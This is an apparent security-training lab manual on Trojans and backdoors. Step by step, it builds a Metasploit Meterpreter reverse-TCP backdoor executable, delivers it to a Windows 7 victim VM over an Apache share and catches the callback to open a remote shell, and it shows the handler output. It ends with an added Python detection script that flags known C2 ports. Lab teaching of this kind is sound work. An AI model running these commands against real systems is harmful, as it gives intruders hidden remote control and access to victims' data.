Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Lab Scenario

Large companies are common targets for hackers and attackers of various kinds, and it is not uncommon for these companies to actively monitor traffic to and from their critical IT infrastructure. Based on the functionality of the Trojan, we can safely surmise that its intent is to open a backdoor on a compromised computer, allowing a remote attacker to monitor activity and steal information from that computer. Once installed inside a corporate network, the backdoor feature of the Trojan can also let the attacker use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of information that may be stolen could potentially be far greater than that existing on a single machine. A basic principle of all malicious programs is that they need user support to do damage to a computer. That is why Trojan horses try to deceive users by disguising themselves as some other form of email. Backdoor programs are used to gain unauthorized access to systems; hackers use backdoor software to gain access to a system so that they can send malicious software into that particular system. A successful attack in which the hacker or attacker infects the target environment with a customized Trojan horse (backdoor) reveals the exploitable holes in the current security system.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

■ Creating a server and testing the network for attack

■ Attacking a network using a sample backdoor and monitoring the system activity

Lab Environment

To carry this out, you need:

■ A computer running Windows Server 2012

■ BackTrack 5 r3 running in a virtual machine

■ Windows 7 running in a virtual machine (victim machine)

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Tasks

TASK 1

Create Server Connection

1. Start the BackTrack 5 virtual machine.

2. Open the terminal console by navigating to Applications → BackTrack → Exploitation Tools → Network Exploitation Tools → Metasploit Framework → msfconsole

Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tool.

FIGURE 11.1: Selecting msfconsole from Metasploit Framework

3. Type the following command in msfconsole: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe and press Enter.

Note: This IP address (10.0.0.6) is the BackTrack machine's. These IP addresses may vary in your lab environment.

FIGURE 11.2: Creating Backdoor.exe

4. This command will create a Windows executable file named Backdoor.exe, which will be saved on the BackTrack 5 desktop.

FIGURE 11.3: Created Backdoor.exe file

5. Now you need to share Backdoor.exe with your victim machine (Windows 7) by following these steps:

6. Open a new BackTrack 5 terminal (CTRL+ALT+T), then run the command mkdir /var/www/share and press Enter to create a new directory named share.

To create the new directory share, the following command is used: mkdir /var/www/share

FIGURE 11.4: sharing the file

7. Change the mode of the share folder to 755 by entering the command chmod -R 755 /var/www/share/ and then pressing Enter.

To change the mode of the share folder, use the following command: chmod -R 755 /var/www/share/

FIGURE 11.5: Changing the mode of the share folder to 755

8. Change the ownership of that folder to www-data by entering the command chown -R www-data:www-data /var/www/share/ and then pressing Enter.

FIGURE 11.6: Change the ownership of the folder

9. Type the command ls -la /var/www/ | grep share and then press Enter.

FIGURE 11.7: Sharing the Backdoor.exe file

To change the ownership of the folder to www-data, use this command: chown -R www-data:www-data /var/www/share/

10. The next step is to start the Apache server by typing the command service apache2 start in the terminal and pressing Enter.

FIGURE 11.8: Starting Apache Webserver

11. Now that your Apache web server is running, copy the Backdoor.exe file into the share folder. Type the following command: cp /root/Desktop/Backdoor.exe /var/www/share/ and press Enter.

FIGURE 11.9: Running Apache Webserver

12. Now go to the Windows 7 Virtual Machine, open Firefox or any web browser, type the URL http://10.0.0.6/share/ in the URL field, and then press Enter.

Note: Here 10.0.0.6 is the IP address of BackTrack; it may vary in your lab environment.

The following command copies payloads that Metasploit saved under its data directory into the web share: cp /root/.msf4/data/exploits/* /var/www/share/

[Firefox on Windows 7 showing the directory listing Index of /share at http://10.0.0.6/share/, with Backdoor.exe (72K, 23-Oct-2012 12:12), served by Apache/2.2.14 (Ubuntu) Server at 10.0.0.6 Port 80]

FIGURE 11.10: Firefox web browser with Backdoor.exe

13. Download the Backdoor.exe file in the Windows 7 Virtual Machine and save it on the desktop.

FIGURE 11.11: Saved Backdoor.exe on desktop

14. Switch back to the BackTrack machine.

15. Open the Metasploit console. To create a handler for the connection from the victim machine (Windows 7), type the command use exploit/multi/handler and press Enter.

If you do not have apache2 installed, run apt-get install apache2.

The exploit will be saved in the /root/.msf4/data/exploits/ folder.

FIGURE 11.12: Exploit the victim machine

16. To use the reverse TCP payload, type the command set payload windows/meterpreter/reverse_tcp and press Enter.

To set reverse TCP, use the following command: set payload windows/meterpreter/reverse_tcp

FIGURE 11.13: Set up the reverse TCP payload

17. To set the local IP address that will catch the reverse connection, type the command set lhost 10.0.0.6 (the BackTrack IP address) and press Enter.

FIGURE 11.14: Set the local IP address (lhost)

18. To start the handler, type the command exploit -j -z and press Enter.

FIGURE 11.15: Exploit the Windows 7 machine

19. Now switch to the victim machine (Windows 7) and double-click the Backdoor.exe file (which is already downloaded) to run it.

20. Switch back to the BackTrack machine; you will see the output shown in the following figure.

[msfconsole output: Started reverse handler on 10.0.0.6:4444; Starting the payload handler...; Sending stage to 10.0.0.5; Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.5:49458)]

FIGURE 11.16: Exploit result on the Windows 7 machine

21. To interact with the available session, type the command sessions -i 1 and press Enter.

To interact with an available session, you can use sessions -i <session id>

FIGURE 11.17: creating the session

22. Enter the command shell and press Enter.

[msfconsole output: sessions -i 1 starts interaction with session 1; the shell command opens a Windows command prompt on the victim: Microsoft Windows [Version 6.1.7601], Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Admin\Desktop>]

FIGURE 11.18: Type the shell command

23. Type the dir command and press Enter. It lists the directories present on the victim machine (Windows 7).

FIGURE 11.19: Check the directories of Windows 7
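The two labs in this module exercise the two backdoor connection patterns a defender has to recognise on an endpoint: the MoSucker server accepting the attacker's connection on its configured port (4288 in the lab), and the msfpayload windows/meterpreter/reverse_tcp backdoor calling back to the handler on 10.0.0.6:4444. The following Python triage function is an added example, not part of the lab manual: the event records are constructed in a Sysmon-like shape, the port watchlist and protected-directory list are assumptions, and the rule set generalizes beyond the lab by also flagging any unsigned binary outside the install directories that acts as a network listener.

```python
from dataclasses import dataclass

# Ports seen in this module's labs: Metasploit's multi/handler default is 4444
# and the MoSucker server in the lab was built with connection port 4288.
# Assumed watchlist for the example; a real deployment maintains its own.
C2_PORTS = {4444, 4288}

# Directories from which installed, vendor-signed software normally runs.
PROTECTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class NetEvent:
    """One endpoint network-connection record (constructed, Sysmon-like shape)."""
    image: str         # path of the process that opened or accepted the connection
    signed: bool       # Authenticode verdict reported by the endpoint agent
    direction: str     # "out": process connected to a remote host; "in": it accepted one
    local_port: int
    remote_ip: str
    remote_port: int


def in_protected_dir(image: str) -> bool:
    """True when the binary lives under a standard install directory."""
    return image.lower().startswith(PROTECTED_DIRS)


def classify(ev: NetEvent) -> list[str]:
    """Return the reasons an event looks like a Trojan or backdoor; [] means benign."""
    reasons: list[str] = []
    untrusted_origin = not ev.signed and not in_protected_dir(ev.image)

    # Both labs start the same way: an unsigned binary outside the install
    # directories (the Open File - Security Warning dialog flagged exactly this).
    if untrusted_origin:
        reasons.append("unsigned executable outside protected install directories")

    # Reverse-connection backdoor (windows/meterpreter/reverse_tcp): the victim
    # process dials out to the handler, in the lab on the default port 4444.
    if ev.direction == "out" and ev.remote_port in C2_PORTS:
        reasons.append(f"outbound connection to known C2 port {ev.remote_port}")

    # Bind-style backdoor (MoSucker server): the victim process accepts the
    # attacker's connection on the port configured when the server was built.
    if ev.direction == "in":
        if ev.local_port in C2_PORTS:
            reasons.append(f"inbound connection accepted on known C2 port {ev.local_port}")
        elif untrusted_origin:
            reasons.append("untrusted executable acting as a network listener")
    return reasons


# Constructed sample telemetry: the two lab scenarios plus benign noise.
# 10.0.0.99 stands in for the attacker's Windows 8 machine (not given in the lab).
SAMPLE_EVENTS = [
    NetEvent(r"C:\Users\Admin\Desktop\Backdoor.exe", False, "out", 49458, "10.0.0.6", 4444),
    NetEvent(r"Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker\server.exe",
             False, "in", 4288, "10.0.0.99", 51322),
    NetEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", True, "out", 49401, "10.0.0.6", 80),
    NetEvent(r"C:\Windows\System32\svchost.exe", True, "in", 445, "10.0.0.7", 52010),
]


def triage(events: list[NetEvent]) -> dict[str, list[str]]:
    """Map each suspicious image path to its reasons; benign events are dropped."""
    return {ev.image: reasons for ev in events if (reasons := classify(ev))}


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS).items():
        print(image)
        for reason in reasons:
            print("   -", reason)
```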

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit

Information Collected/Objectives Achieved: Output: Hack the Windows 7 machine directories

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs
